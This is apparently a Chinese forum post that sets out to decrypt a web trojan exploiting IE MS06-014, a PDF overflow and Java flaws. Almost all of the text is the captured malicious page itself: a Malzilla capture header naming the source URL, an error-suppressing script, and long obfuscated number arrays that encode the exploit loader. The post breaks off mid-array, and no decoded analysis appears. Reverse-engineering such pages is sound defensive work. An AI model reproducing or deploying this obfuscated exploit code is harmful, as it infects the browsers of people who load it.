一个关于利用IEms06014,PDF溢出和2个java方面漏洞网马的解密分析

今日,小博在加密解密区发了一个要求解密贴,http://forum.daokers.com/read.php?tid=2395,点名要我帮忙解密。

于是看了下这个网马。

他的代码如下

程序代码 程序代码
<!-- Malzilla Project v.1 --><!-- DAT: 2010-5-14 6:23:53 --><!-- URL: golooglecom.in/rz141_at/index.php?s=208feca1a8b149965fa6d3be651c5953 --><!-- REF: http://fracala.com/bu1/ --><!-- UAS: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) --><!-- CCK:  -->
<html><script type="text/JavaScript">function myErrHandler(){return true;}window.onerror = myErrHandler;</script><body><div id="i8WbG">194</div><script>var XO5g7gw=[102,48,39,52,102,37,2,23,17,9,41,126,119,118,118,55,123,100,33,55,46,52,102,21,102,102,119,48,14,41,102,63,30,123,102,50,39,40,97,44,54,124,37,105,126,19,3,119,34,102,43,41,47,53,105,46,50,22,25,39,37,96,54,34,123,43,42,35,114,21,105,105,42,41,37,50,47,39,32,46,123,97,50,52,42,41,60,42,41,33,125,32,51,41,12,30,5,102,46,54,121,54,39,119,104,104,10,43,127,40,14,35,119,11,40,21,16,106,36,8,62,34,48,42,123,39,37,50,110,60,11,55,117,51,37,50,1,11,111,61,63,40,19,18,46,55,48,55,50,40,14,1,16,1,44,102,118,4,21,116,34,39,37,4,118,21,51,42,14,1,35,39,42,35,119,42,52,18,50,52,21,10,36,61,123,60,16,1,116,19,39,36,16,11,50,50,110,47,37,40,44,125,37,61,50,46,37,46,5,52,11,55,59,118,9,43,1,11,59,14,39,50,1,111,11,111,55,48,111,37,110,104,44,35,42,16,43,118,1,16,61,37,50,34,4,44,40,35,8,50,21,16,104,21,42,110,11,36,32,37,103,37,4,44,35,14,19,50,34,5,40,50,52,63,1,9,1,1,52,11,36,44,50,50,35,39,61,1,55,116,48,55,50,35,11,123,60,119,37,4,59,37,18,50,46,8,10,61,118,4,111,110,39,59,106,26,100,59,50,118,40,39,1,63,61,37,1,37,37,1,103,26,100,111,44,42,119,11,110,40,14,1,37,11,47,46,110,35,5,43,16,1,111,61,9,36,50,52,1,18,44,32,14,11,110,19,110,60,35,55,123,50,11,42,50,35,36,52,16,39,47,32,37,37,37,106,39,50,106,26,100,16,104,50,21,55,50,111,40,44,35,21,48,59,59,116,10,50,34]; var XmhnFwsJ7JLb5rn=[48,63,114,50,46,40,12,54,20,50,115,33,57,123,6,120,115,59,33,6,120,6,120,57,24,18,29,39,29,18,29,29,23,56,32,29,23,103,29,48,54,106,52,106,9,12,116,46,63,9,43,12,23,57,55,29,24,46,21,59,14,35,114,20,44,23,50,107,33,46,50,39,57,43,57,56,48,63,115,59,46,6,120,46,39,6,120,118,22,107,40,46,33,46,23,115,33,57,62,106,29,114,39,104,15,23,43,12,23,57,24,29,54,114,123,57,24,12,63,115,33,106,52,29,23,12,116,9,14,18,29,35,29,48,29,51,60,50,48,56,63,29,32,46,21,103,52,18,20,22,46,48,54,62,59,114,9,56,6,120,44,57,46,55,59,46,57,43,63,24,39,57,29,54,118,46,46,104,57,24,114,114,51,60,35,63,57,33,48,29,15,123,6,120,115,115,33,39,32,115,52,46,40,12,9,18,29,106,39,57,50,29,23,103,57,57,23,18,29,50,20,44,43,46,63,9,29,12,116,12,115,107,33,48,54,57,14,23,43,46,104,48,46,56,23,63,40,29,114,106,52,62,59,115,59,52,114,22,52,56,48,63,114,46,55,46,21,39,60,47,39,57,24,51,54,50,23,63,46,29,57,15,46,98,0,106,111,106,97,59,45,33,39,39,40,13,9,104,52,43,2,28,45,115,29,47,29,57,109,12,105,42,110,52,122,17,14,6,120,24,18,53,9,107,55,40,114,46,9,55,35,31,63,13,34,62,15,18,53,63,33,43,116,40,62,115,111,31,9,103,104,109,9,13,59,46,42,31,106,63,63,97,109,63,44,56,25,12,63,59,40,55,21,116,48,51,24,41,6,120,47,53,122,50,55,61,116,28,51,111,110,40,46,103,59,105,17,21,46,41,46,51,52,46,63,114,105,9,57]; var FIovKVqj92UWt=[124,72,79,77,119,108,23,75,108,70,73,2,92,94,92,99,29,90,93,85,90,80,19,99,29,78,79,90,79,91,6,90,99,29,19,77,11,117,82,90,99,29,20,108,83,94,79,74,15,103,71,31,99,29,99,29,22,4,108,82,83,72,76,122,13,8,10,99,29,86,12,83,17,124,79,87,99,29,126,99,29,12,92,20,99,29,20,99,29,83,69,20,99,29,75,99,29,20,99,29,20,99,29,7,99,29,4,73,94,77,121,81,79,99,29,86,99,29,20,71,31,99,29,20,99,29,117,74,6,90,80,117,99,29,99,29,94,22,73,103,12,13,6,19,117,11,124,2,79,12,119,74,71,107,7,9,109,94,22,112,82,99,29,124,91,71,78,10,108,108,82,78,104,112,124,77,31,121,112,80,122,99,29,126,23,94,13,8,125,82,90,13,15,4,119,78,17,108,75,77,123,121,123,72,122,108,2,112,90,90,77,81,83,125,2,12,105,125,104,83,103,70,116,91,15,83,91,111,104,75,77,4,74,87,17,8,94,75,87,23,86,17,82,124,13,120,125,90,87,82,8,77,125,104,90,105,90,74,86,94,80,83,12,122,83,116,91,92,124,74,90,71,7,107,19,104,91,119,70,90,77,121,108,79,117,78,68,121,71,117,4,17,82,77,6,78,2,23,78,22,114,80,104,13,13,15,9,90,108,22,121,69,4,12,121,125,112,72,124,2,23,74,13,108,77,70,91,109,6,75,124,103,86,8,99,29,112,71,103,80,19,119,7,99,29,114,112,20,12,90,99,29,20,99,29,89,117,122,79,11,20,20,124,91,20,99,29,107,99,29,99,29,77,13,115,10,12,108,82,99,29,99,29,80,99,29,119,17,20,99,29,99,29,81,124,114,15,99,29,103,92,9,90,112,19,107,111,76,80]; var GhS8S67Prhrd4n=[86,111,77,98,15,117,83,31,28,97,104,83,123,5,23,66,104,112,9,72,87,15,31,31,127,119,68,70,85,96,123,5,123,5,14,11,17,84,66,94,92,94,104,98,115,66,111,116,123,5,12,123,5,116,95,83,65,97,104,67,30,90,28,14,92,70,79,114,22,23,116,12,112,86,21,80,87,68,79,82,66,16,75,14,20,123,5,111,9,72,26,100,20,123,5,127,123,5,104,123,5,19,18,66,23,104,14,100,127,117,21,127,15,106,109,74,100,115,123,5,115,123,5,123,5,12,104,104,98,123,5,12,66,107,21,17,107,11,117,106,116,12,123,5,72,87,106,123,5,28,97,123,5,22,77,68,123,5,119,123,5,115,21,28,66,73,86,98,119,31,14,127,90,92,15,31,94,79,112,9,11,12,97,104,31,111,15,66,14,83,123,5,23,96,98,26,17,114,85,70,75,84,66,68,79,83,104,70,11,116,65,107,23,116,116,16,100,94,21,117,92,86,20,104,111,116,95,12,123,5,85,127,98,72,123,5,123,5,106,123,5,82,100,80,21,23,112,85,127,123,5,81,66,18,66,123,5,127,15,20,87,67,30,66,12,12,12,123,5,66,19,106,123,5,21,123,5,109,12,123,5,115,123,5,11,123,5,123,5,12,115,106,74,66,123,5,117,107,111,28,23,9,116,21,14,100,104,104,31,17,97,115,123,5,66,116,66,123,5,104,98,72,87,11,73,79,94,112,11,98,119,83,68,15,83,96,119,65,70,79,15,31,77,22,117,111,9,66,14,92,31,75,114,127,86,17,83,87,117,83,23,107,111,68,70,104,117,85,84,28,90,112,66,104,66,66,86,82,66,104,94,100,104,28,106,92,97,84,83,15,31,66,73,15,123,5,73,66,80,7,21,97,112,14,98,123,5,72,14]; var pC97R8mG=[22,62,9,11,120,115,1,36,127,63,6,96,45,47,38,27,26,61,98,29,38,1,124,126,13,30,32,110,117,51,26,60,34,98,118,55,4,13,40,117,43,58,59,60,43,103,126,102,22,47,43,103,124,118,53,120,51,51,59,51,54,61,51,32,96,8,58,45,52,119,118,117,28,4,43,115,96,26,120,43,13,102,1,117,43,13,127,43,60,54,8,1,34,32,126,25,60,43,8,1,43,1,61,26,42,44,55,62,124,124,25,34,4,33,54,4,1,118,103,126,61,124,32,59,117,52,119,96,118,59,43,32,33,28,117,52,1,62,115,8,25,44,103,60,119,54,13,124,12,96,42,55,102,103,124,26,39,34,43,117,118,96,1,62,4,118,59,8,52,58,8,54,60,4,103,102,13,59,43,102,43,26,33,119,54,54,54,4,29,38,60,42,39,40,4,56,96,29,47,6,98,13,26,117,63,8,12,35,55,11,6,43,34,60,42,60,22,63,58,124,32,110,43,34,43,58,62,11,29,103,127,33,61,55,11,29,32,117,45,59,102,63,102,103,35,12,39,40,63,47,54,96,45,1,110,110,35,32,59,60,59,22,47,45,117,43,8,42,42,115,57,43,47,60,13,45,56,47,32,39,30,58,119,63,120,47,123,29,51,61,54,125,53,56,124,20,15,60,32,3,15,125,105,123,124,115,52,1,121,43,60,110,8,13,126,117,120,110,127,12,56,10,55,102,60,119,124,5,119,118,125,15,120,123,99,127,63,119,11,125,13,105,126,127,126,99,10,13,120,123,98,105,118,122,8,13,125,99,126,126,99,99,123,15,15,99,127,120,12,10,119,125,105,98,123,126,99,126,126,120,127,120,119,11,99,122,99,11,13,119,12,13,122,11,10,126,98,105,124,121,121,99,124,125,125,126,105,15,122]; var DRBSwL67q34RN=[16,21,100,101,101,16,100,102,96,96,113,19,18,97,123,20,23,18,103,102,102,102,102,19,96,102,102,102,21,123,18,102,102,111,111,102,102,113,102,103,102,123,102,102,102,123,102,103,103,102,123,102,102,96,21,102,123,102,101,102,102,113,123,102,16,123,122,23,102,102,102,102,102,102,102,102,102,102,113,21,102,102,102,102,102,102,102,102,102,98,96,96,113,122,98,101,123,102,102,123,53,103,48,50,123,102,97,96,96,102,99,96,102,102,102,53,97,102,55,55,111,18,50,123,51,97,110,113,111,50,100,100,48,53,102,123,98,99,103,51,96,123,110,113,122,98,51,101,101,97,101,18,110,21,123,98,103,98,111,21,96,103,123,97,16,123,110,23,16,99,20,20,100,20,123,103,16,123,16,23,18,102,123,18,101,19,16,113,110,123,100,98,101,122,113,102,96,123,101,101,113,97,16,21,102,16,122,96,123,23,101,101,101,21,101,96,19,101,101,111,19,16,18,111,123,101,103,113,102,122,113,111,98,110,102,100,102,19,110,99,98,103,100,101,123,110,123,123,103,98,16,96,100,98,123,123,110,96,97,97,97,21,18,110,103,96,110,96,113,18,123,20,53,111,16,23,102,103,97,98,110,20,100,18,101,111,16,99,102,97,96,113,98,20,122,103,102,123,111,101,98,99,23,113,16,123,110,99,96,123,98,111,102,20,99,98,21,110,98,98,113,103,20,98,101,100,97,100,123,110,101,21,18,123,48,111,16,20,101,97,18,123,103,111,103,110,102,122,113,18,102,102,123,98,99,21,96,113,123,96,111,16,122,103,123,103,123,98,23,110,21,123,96,23,20,21,16,123,98,111,96,21,96,16,20,16,18,23,102,52,19,21,21,58,23,35,58,97,21,100,99,113,103,100,127,20,113,20,21]; var ase4R143=[103,98,107,100,58,40,101,106,22,98,36,51,37,8,60,59,96,35,126,60,25,55,62,102,49,101,111,96,39,34,107,15,123,41,105,37,1,35,102,33,122,36,102,103,32,62,55,42,37,34,9,59,2,31,29,60,97,103,23,96,101,114,96,98,62,98,23,54,101,29,63,61,111,54,39,1,61,105,20,32,55,51,97,105,55,61,97,1,63,63,38,55,23,62,49,60,38,124,55,14,112,97,61,38,56,55,49,38,122,123,61,55,1,23,96,59,48,14,112,49,48,49,63,103,55,60,101,33,14,112,49,102,63,39,38,14,112,54,124,98,37,34,14,112,38,29,42,19,54,25,14,112,38,32,59,15,49,33,55,38,1,8,60,126,107,35,9,59,62,51,62,33,121,101,33,17,2,23,96,29,103,105,96,101,1,35,55,40,122,36,104,122,51,63,114,33,59,102,32,43,96,31,20,36,97,54,41,37,7,111,25,29,34,97,61,123,34,42,59,52,123,52,122,37,98,100,14,112,54,98,55,41,38,55,1,22,102,107,1,24,10,97,39,17,35,32,34,42,32,61,126,14,112,63,103,23,96,101,14,112,121,14,112,38,14,112,1,26,14,112,98,97,1,22,121,58,62,121,55,14,112,121,14,112,52,14,112,122,14,112,59,14,112,121,7,105,14,112,62,124,61,1,49,51,123,41,59,52,34,14,112,99,25,62,59,19,34,8,122,42,60,37,106,23,96,29,32,100,98,14,112,59,121,51,6,5,38,34,37,7,63,61,1,25,102,55,34,123,52,122,49,60,59,99,1,103,32,60,51,38,103,58,123,123,101,39,59,47,55,2,114,55,97,1,31,98,29,96,121,55,105,63,35,107,51,61,32,47,123,41,47,47,38,96,33,55,47,49,8,20,63,54,122,6,33,114,105,123,47]; var kN2Z9ejg8CW=[98,60,59,32,32,101,107,56,76,50,115,127,126,48,121,113,100,48,56,115,101,126,90,61,102,34,45,107,122,100,98,48,101,117,57,100,43,76,50,119,113,122,48,79,116,100,56,57,113,124,48,105,43,48,118,76,76,126,96,127,76,76,90,76,50,103,61,61,127,119,124,113,102,127,115,127,125,42,114,76,76,124,121,48,120,121,126,76,76,76,76,76,76,76,76,106,33,113,62,98,125,124,117,115,127,117,76,76,63,98,125,63,73,54,79,33,99,113,63,127,119,62,100,100,124,127,102,116,120,126,62,113,62,104,36,73,45,63,47,127,127,119,118,120,100,127,96,124,121,99,116,127,117,62,118,48,33,96,100,121,103,48,126,113,45,96,56,103,93,121,127,118,121,96,96,94,115,98,98,62,102,100,119,76,50,117,48,127,117,113,126,43,121,98,113,113,107,98,105,48,100,48,76,50,100,96,100,125,45,45,117,125,48,126,107,102,113,98,124,99,48,85,48,48,89,126,117,126,48,127,85,124,117,125,98,117,98,76,50,104,116,127,115,57,56,100,45,57,117,127,90,101,127,117,126,85,83,68,113,76,50,115,121,62,48,121,76,50,95,82,76,50,100,98,100,62,115,61,45,48,85,43,99,124,113,99,82,83,32,85,83,85,86,81,42,83,84,86,115,32,116,48,85,84,81,127,83,39,32,32,61,116,32,109,101,32,124,99,32,32,43,82,113,61,86,86,61,85,48,127,84,115,126,57,43,101,83,117,57,81,81,76,50,90,115,120,56,125,117,95,48,62,124,45,117,115,48,48,115,116,100,115,85,126,100,56,76,50,113,98,56,117,126,120,113,100,115,124,113,101,83,68,43,127,62,127,98,117,34,100,107,102,121,116,34,99,125,82,124,121,124,99,117,85,113,62,36,48,40]; var C59CT49=[58,73,59,107,34,83,45,38,83,45,74,34,62,63,55,50,47,54,76,108,59,124,47,78,75,34,63,63,108,62,75,122,34,63,114,60,83,45,53,55,62,59,77,60,74,108,61,33,63,103,54,54,75,54,106,54,114,47,99,124,52,125,47,96,110,97,74,99,38,98,106,110,47,97,96,33,106,69,39,106,99,110,74,96,116,121,106,97,121,110,47,107,77,108,122,122,106,52,83,45,64,98,76,91,39,123,106,123,98,38,52,108,125,47,50,50,38,33,106,97,47,64,123,106,74,97,47,107,83,45,123,106,99,47,108,77,33,122,83,45,91,125,47,52,96,118,127,125,96,32,97,127,110,108,106,97,123,39,102,99,106,83,45,110,110,123,96,123,122,125,98,74,76,47,106,97,50,83,45,98,106,34,124,123,96,122,97,69,34,127,99,106,104,123,100,123,102,127,127,97,33,102,97,118,110,109,99,96,96,127,96,108,102,99,123,123,118,99,98,52,107,106,50,110,123,102,106,106,125,102,127,47,127,127,99,118,98,83,45,97,47,52,101,127,102,97,123,123,109,96,96,98,99,96,122,96,102,108,121,110,123,83,45,110,127,106,97,38,99,52,110,123,33,97,32,106,107,127,83,45,34,107,118,33,107,76,106,34,108,122,96,110,100,102,39,96,123,127,97,123,97,118,123,109,107,102,33,52,107,108,106,97,110,127,96,107,107,96,33,106,97,38,114,47,76,107,103,123,99,107,52,103,125,118,98,103,102,99,103,47,38,97,38,116,39,122,99,110,122,97,47,47,127,106,122,99,116,106,108,39,123,108,96,33,110,114,47,116,114,38,52,114,39,114,33,52,108,110,106,108,103,39,97,124,63,123,47,108,47,83,45,96,39,114,122,104,38,98,47,35,62,63,63,110,123,108,103,91,122]; var Lc38a4J3mH2mYd=[87,11,3,73,24,70,69,86,66,64,127,1,73,66,85,87,74,70,10,3,3,81,85,3,77,3,3,11,10,24,87,66,124,71,74,3,66,70,3,76,124,85,80,102,30,77,71,3,79,65,11,73,66,10,13,66,81,10,88,70,78,85,79,76,64,70,78,87,70,87,11,64,66,86,66,70,77,79,66,83,83,70,77,87,78,77,87,70,70,83,66,87,70,127,1,127,1,81,24,30,127,1,85,87,81,3,79,70,78,70,13,3,81,24,78,66,78,66,66,70,79,70,83,66,81,66,78,70,10,127,1,71,3,79,70,81,74,65,66,78,13,78,70,77,87,11,127,1,70,76,64,86,87,98,87,86,80,70,127,1,70,78,15,87,66,83,102,81,64,70,85,66,81,11,127,1,24,83,70,78,13,80,3,87,77,87,3,127,1,18,79,66,64,127,1,10,86,66,78,70,127,1,87,70,65,127,1,11,64,19,80,78,98,79,87,81,74,87,26,19,70,18,86,70,64,15,66,65,70,18,21,21,26,65,26,19,66,69,70,66,23,69,19,16,70,17,16,66,69,64,22,26,16,23,19,18,70,26,19,69,69,65,66,21,20,21,66,65,27,65,23,26,66,21,19,71,70,27,69,69,70,21,69,21,27,19,26,21,66,69,64,20,66,70,66,21,17,21,66,22,69,21,70,27,70,21,17,71,27,21,64,17,71,21,17,65,66,21,64,16,71,19,66,66,26,27,66,19,65,66,17,71,17,21,17,21,23,16,19,71,71,71,26,71,64,70,70,19,17,21,71,19,26,21,17,19,70,19,70,69,71,66,71,16,22,22,66,21,26,27,17,16,22,18,64,22,66,21,66,23,70,64,22,21,69,71,64,21,17,23,66,21,66,16,22,27,23,71,71,16,66,21,22,26,69,27,71,23,71]; var tTk37HLK=[125,43,46,124,122,121,47,42,122,124,38,124,122,124,39,124,123,126,121,124,122,38,122,38,45,126,122,38,42,43,122,125,126,43,41,124,41,126,41,126,123,45,126,43,122,126,41,122,44,42,122,123,42,43,40,122,41,45,47,126,41,124,43,124,44,124,126,45,38,42,38,121,41,124,122,126,41,124,42,125,45,124,41,121,39,122,123,126,42,43,42,40,126,124,124,126,44,39,47,124,40,41,46,126,45,45,42,126,126,121,44,126,45,123,122,124,47,124,45,126,126,45,45,121,41,41,46,122,41,42,41,121,46,40,42,41,41,38,41,45,123,121,38,121,122,121,41,121,42,121,123,126,44,121,40,121,47,121,41,42,39,121,41,121,47,123,122,126,47,38,126,126,123,42,38,121,47,121,41,121,126,123,45,38,42,42,44,39,41,121,47,123,38,125,42,121,41,41,121,126,42,39,44,41,121,42,42,45,44,126,42,45,41,46,123,43,39,122,41,123,47,47,123,123,45,41,42,122,41,40,47,123,123,125,40,40,123,126,38,40,125,126,42,45,40,122,122,125,38,38,124,38,124,41,46,126,125,43,40,121,39,42,42,38,123,124,125,126,126,45,123,126,42,45,44,40,125,121,39,121,121,41,123,121,47,40,123,126,39,39,123,121,39,42,39,122,44,41,42,125,126,126,123,122,124,45,45,126,42,39,40,42,38,123,122,47,122,45,123,45,39,42,123,126,45,39,122,123,38,121,123,46,39,38,47,38,42,41,38,43,38,38,124,124,45,40,124,124,123,126,39,43,126,123,41,124,41,124,38,124,38,45,43,123,42,121,38,125,124,39,38,123,126,124,45,124,126,43,123,125,42,124,44,39,39,43,40,124,125,124,40,38,39,123,46,123,124,124,40,124,40,124,38,124,46,39,39,38,45]; var L58iTmje915Cs=[104,104,105,104,53,103,53,102,53,104,50,48,50,52,53,99,104,50,55,104,50,100,50,48,105,101,50,55,53,104,50,104,105,97,50,97,105,105,50,97,50,102,50,99,37,52,48,51,50,101,104,51,50,103,55,104,106,100,53,103,37,52,16,103,104,56,51,36,53,16,50,96,13,115,59,48,39,48,52,37,13,115,53,52,33,52,48,102,61,52,13,115,125,113,120,61,52,34,61,50,59,50,62,106,13,115,121,37,60,127,34,52,48,39,35,33,35,5,13,115,120,48,35,125,13,115,37,52,53,36,37,16,121,37,52,113,37,96,48,39,56,127,51,35,13,115,57,127,52,52,13,115,51,39,60,127,34,52,60,52,48,56,106,59,50,52,37,13,115,13,115,120,116,36,37,16,48,13,115,125,59,61,52,37,37,35,56,37,60,54,48,38,56,59,121,53,113,121,37,97,97,52,13,115,13,115,35,52,56,97,97,57,13,115,39,37,127,34,120,106,59,61,125,113,13,115,96,52,48,16,37,120,57,13,115,96,52,63,116,48,52,57,33,48,36,37,52,51,37,33,56,106,121,33,48,13,115,52,35,53,61,127,61,52,60,52,18,52,60,61,53,39,127,39,37,57,56,48,48,127,48,120,106,59,62,62,53,40,53,63,51,53,60,50,36,60,52,56,61,53,121,63,33,33,52,48,52,120,106,44,113,18,120,113,57,56,48,97,97,52,120,106,13,115,52,54,59,48,14,56,37,113,52,61,62,62,14,56,106,113,113,36,121,13,115,37,30,39,5,34,60,63,50,35,63,39,48,125,98,34,51,97,55,121,60,36,37,37,62,40,113,120,42,63,53,53,113,33,35,37,33,55,48,61,37,13,115,37,55,113,48,37,52,121,52,20,60,52,51,42,30,51,59,120,108,59,50,36,60]; var MoDbuKo7Zc73A7y=[126,79,73,101,104,79,94,105,79,118,8,79,78,73,88,79,68,94,2,79,73,90,107,94,17,17,6,76,4,118,8,78,118,8,118,8,67,78,4,4,89,96,111,94,94,88,67,90,94,79,2,95,73,72,10,94,64,3,10,78,76,94,78,70,95,27,79,78,118,8,6,105,76,88,67,72,2,118,8,75,89,29,18,94,7,79,107,26,18,89,101,72,64,108,31,7,118,8,107,19,7,30,89,67,67,78,73,79,94,70,3,17,4,27,107,110,25,31,118,8,73,30,89,26,7,16,24,67,70,90,69,107,18,83,4,68,94,27,105,30,26,26,118,8,75,64,76,79,24,26,31,95,68,72,78,110,30,30,78,2,105,66,94,78,26,90,17,92,75,88,72,78,73,88,71,79,90,78,10,92,69,4,79,73,89,2,92,2,94,101,79,79,10,64,78,76,79,79,88,10,70,10,94,17,27,3,69,68,10,23,92,124,79,88,113,67,17,92,3,6,89,88,109,67,10,27,23,90,88,4,89,90,118,8,3,10,4,118,8,23,118,8,79,10,2,29,2,10,17,67,76,89,92,79,88,70,23,118,8,3,22,10,113,118,8,92,79,3,10,17,92,79,88,20,67,94,2,118,8,29,4,10,119,118,8,88,10,79,88,2,27,10,23,10,23,79,10,86,30,119,12,4,2,79,92,10,88,2,92,88,79,118,8,3,10,86,12,12,3,10,10,2,118,8,88,92,20,12,10,2,92,118,8,3,10,18,23,27,12,86,3,4,29,118,8,10,118,8,10,4,86,10,10,3,88,10,18,118,8,27,25,20,10,19,118,8,22,90,92,79,2,92,73,22,118,8,12,4,10,3,23,10,2,75,95,71,79,23,70,78,69,88,10,81,94,118,8,10,10,2,79,111,70,88,68,94,4,73,10]; var axrg9i4sOv=[55,122,120,55,62,104,123,108,123,127,123,66,60,55,108,123,123,112,106,115,123,55,123,39,106,114,115,106,112,123,122,120,115,48,109,123,106,106,54,127,125,106,113,66,60,123,123,37,110,123,66,60,119,120,66,60,95,114,113,109,108,119,36,106,115,106,112,108,119,124,121,49,49,121,113,106,62,42,118,123,107,54,66,60,49,108,110,37,114,123,65,127,114,123,125,123,110,47,50,118,115,48,120,106,55,112,120,48,106,49,123,54,119,106,110,118,115,106,95,122,110,47,100,113,123,37,106,108,62,44,120,123,35,66,60,110,106,112,33,110,122,106,109,66,60,106,95,122,106,108,107,124,55,118,46,122,48,109,123,66,60,113,119,123,106,123,54,66,60,105,115,123,121,46,119,50,106,48,124,125,112,123,37,112,120,122,114,123,66,60,118,110,118,123,115,123,113,48,124,107,106,106,110,50,106,122,115,123,112,118,127,122,112,119,62,123,114,122,120,123,103,44,46,46,55,62,109,99,125,107,122,54,110,114,101,74,54,55,119,48,99,106,55,99,106,66,60,119,127,123,65,119,123,46,125,93,106,62,37,99,123,106,62,62,62,50,39,46,62,37,62,118,54,123,62,62,113,107,66,60,110,62,62,122,120,55,62,55,62,115,54,62,62,62,62,62,62,62,62,62,37,62,62,62,62,46,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,60,37,62,104,127,108,62,118,77,107,123,40,71,84,43,45,35,125,90,79,73,81,113,38,47,46,46,111,48,109,110,114,119,106,54,60,60,55,37,62,104,127,108,62,68,46,74,77,113,100,35,43,40,43]; var Yw8hi55BB61NPYB=[7,8,19,69,82,65,19,95,90,90,11,116,112,2,74,4,11,3,75,14,10,8,19,69,82,65,19,117,0,5,1,121,73,107,126,114,93,5,14,93,86,68,19,114,65,65,82,74,27,7,31,10,31,11,31,4,31,2,31,6,31,10,31,7,31,2,26,8,19,69,82,65,19,92,97,120,71,112,122,121,71,100,3,11,1,31,107,123,4,114,100,107,91,96,5,31,87,1,7,6,106,64,31,92,7,5,105,92,6,64,101,74,122,81,5,119,31,71,100,68,11,6,69,7,4,6,119,126,93,31,67,2,73,93,1,106,0,0,65,90,125,2,94,31,113,3,6,120,3,5,6,8,85,92,65,19,27,107,123,4,114,100,107,91,96,5,14,3,8,19,107,123,4,114,100,107,91,96,5,15,95,90,90,11,116,112,2,74,4,11,3,75,8,19,107,123,4,114,100,107,91,96,5,24,24,26,19,19,72,19,19,19,19,19,19,69,82,65,19,81,11,5,82,125,74,14,117,0,5,1,121,73,107,126,114,93,5,104,107,123,4,114,100,107,91,96,5,110,25,1,8,19,19,19,19,69,82,65,19,127,3,7,11,99,10,74,14,105,3,103,96,92,73,22,81,11,5,82,125,74,8,19,19,19,19,69,82,65,19,86,66,7,121,67,11,87,14,105,3,103,96,92,73,30,127,3,7,11,99,10,74,8,19,19,19,19,69,82,65,19,87,89,88,101,2,7,114,114,14,86,66,7,121,67,11,87,28,81,11,5,82,125,74,8,19,19,19,19,69,82,65,19,85,107,66,95,82,69,14,87,89,88,101,2,7,114,114,25,117,0,5,1,121,73,107,126,114,93,5,104,107,123,4,114,100,107,91,96,5,110,8,19,19,19,19,92,7,5,105,92,6,64,101,74,122,81,5,119,14]; var K210J6y5ntw=[99,104,115,115,115,115,53,60,33,115,123,60,1,24,39,16,26,25,39,4,99,107,97,110,99,104,115,60,1,24,39,16,26,25,39,4,99,107,97,111,55,57,56,5,98,103,18,18,104,115,60,1,24,39,16,26,25,39,4,99,107,97,120,120,122,115,115,115,115,115,40,115,115,115,115,115,115,115,115,53,60,33,115,123,55,97,103,102,10,32,110,99,104,115,55,97,103,102,10,32,111,21,96,101,97,25,41,11,30,18,61,101,8,11,27,100,18,4,11,59,0,101,14,104,115,55,97,103,102,10,32,120,120,122,115,115,115,115,115,115,115,115,115,40,115,115,115,115,115,115,39,4,36,107,102,37,103,100,102,23,30,61,110,60,103,101,9,60,102,32,5,42,26,49,101,23,120,55,97,103,102,10,32,104,115,115,115,115,115,115,115,115,115,115,115,115,17,99,102,24,99,101,102,110,59,0,38,54,101,10,25,102,96,8,39,4,36,107,102,37,103,100,102,23,30,61,14,104,115,115,115,115,115,115,115,115,115,115,115,115,35,98,41,61,97,10,96,96,33,58,29,98,62,110,39,4,36,107,102,37,103,100,102,23,30,61,120,21,96,101,97,25,41,11,30,18,61,101,8,11,27,100,18,4,11,59,0,101,14,104,115,115,115,115,115,115,115,115,115,115,115,115,59,0,38,54,101,10,25,102,96,8,39,4,36,107,102,37,103,100,102,23,30,61,14,110,59,0,38,54,101,10,25,102,96,8,35,98,41,61,97,10,96,96,33,58,29,98,62,14,104,115,115,115,115,115,115,115,115,115,115,115,115,59,0,38,54,101,10,25,102,96,8,35,98,41,61,97,10,96,96,33,58,29,98,62,14,110,17,99,102,24,99,101,102,104,115,115,115,115,115,115,115,115,115,115,46,115,115]; var gR0F30B=[125,125,125,125,125,125,50,105,107,7,50,104,46,11,36,20,63,107,25,125,118,96,63,101,107,60,19,36,102,125,125,125,125,125,125,125,125,125,32,125,125,32,125,125,62,25,12,10,18,50,101,108,109,109,44,96,53,14,40,56,107,4,23,104,110,115,55,50,52,51,117,127,127,116,102,43,60,47,125,59,51,47,12,108,5,25,110,104,63,96,109,102,43,60,47,125,36,56,109,104,4,106,54,40,26,125,96,125,51,60,43,52,58,60,41,50,47,115,40,46,56,47,28,58,56,51,41,115,41,50,17,50,42,56,47,30,60,46,56,117,116,102,52,46,20,24,125,96,125,117,36,56,109,104,4,106,54,40,26,115,52,51,57,56,37,18,59,117,122,48,46,52,56,122,116,125,124,96,125,112,108,125,123,123,125,36,56,109,104,4,106,54,40,26,115,52,51,57,56,37,18,59,117,122,50,45,56,47,60,122,116,125,96,96,125,112,108,116,102,52,46,18,45,56,47,60,125,96,125,117,36,56,109,104,4,106,54,40,26,115,52,51,57,56,37,18,59,117,122,50,45,56,47,60,122,116,125,124,96,125,112,108,116,102,52,46,26,56,62,54,50,125,96,125,117,36,56,109,104,4,106,54,40,26,115,52,51,57,56,37,18,59,117,122,58,56,62,54,50,122,116,125,124,96,125,112,108,125,123,123,125,36,56,109,104,4,106,54,40,26,115,52,51,57,56,37,18,59,117,122,46,60,59,60,47,52,122,116,125,96,96,125,112,108,116,102,52,46,14,60,59,60,47,52,125,96,125,117,36,56,109,104,4,106,54,40,26,115,52,51,57,56,37,18,59,117,122,46,60,59,60,47,52,122,116,125,124,96,125,112,108,125,123,123,125,36,56,109,104,4,106,54,40,26,115,52,51,57,56]; var a6oXU27F8V=[96,87,126,48,63,123,112,106,119,117,125,63,49,56,37,37,56,53,41,49,35,113,107,83,119,118,105,109,125,106,119,106,56,37,56,48,97,125,40,45,65,47,115,109,95,54,113,118,124,125,96,87,126,48,63,115,119,118,105,109,125,106,119,106,63,49,56,57,37,56,53,41,49,35,113,107,91,112,106,119,117,125,56,37,56,48,97,125,40,45,65,47,115,109,95,54,113,118,124,125,96,87,126,48,63,123,112,106,119,117,125,63,49,56,57,37,56,53,41,49,35,113,126,48,113,107,81,93,57,37,126,121,116,107,125,49,99,113,126,56,48,48,66,90,91,110,90,32,83,33,97,108,42,113,37,118,121,110,113,127,121,108,119,106,54,107,97,107,108,125,117,84,121,118,127,109,121,127,125,49,62,62,48,75,66,42,40,112,66,80,66,90,124,64,37,118,121,110,113,127,121,108,119,106,54,109,107,125,106,84,121,118,127,109,121,127,125,49,62,62,48,98,40,87,44,91,37,118,121,110,113,127,121,108,119,106,54,122,106,119,111,107